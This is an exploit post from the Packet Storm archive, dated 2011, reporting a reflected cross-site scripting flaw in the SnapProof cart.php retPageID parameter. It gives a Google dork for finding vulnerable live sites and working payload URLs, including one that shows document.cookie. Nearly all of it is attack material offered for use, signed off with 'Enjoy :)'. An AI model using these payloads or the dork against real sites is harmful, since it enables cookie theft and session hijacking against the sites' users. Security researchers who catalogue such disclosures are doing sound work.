SnapProof Cross Site Scripting

2011-03-01T00:00:00
ID PACKETSTORM:98802
Type packetstorm
Reporter Difficult 511
Modified 2011-03-01T00:00:00

Description

                                        
                                            `##########################################################  
# Exploit Title: SnapProof (cart.php) Cross Site Scripting  
# Google Dork: inurl:"Created and powered by SnapProof"   
# home : www.D99Y.com  
# Date: 1/3/2011   
# Author: Difficult 511  
# Software Link: http://www.snapproof.com/  
##########################################################  
#  
# file :   
#  
# cart.php  
#  
# exploit :   
#  
# http://localhost/cart.php?retPageID= [ XSS ]  
#   
# http://localhost/cart.php?retPageID=<script>alert(12345)</script>  
#  
# http://localhost/cart.php?retPageID=<script>alert(document.cookie)</script>  
#  
##########################################################  
  
Greetz :   
  
NassRawI and all members D99Y.com  
  
Enjoy :)  
`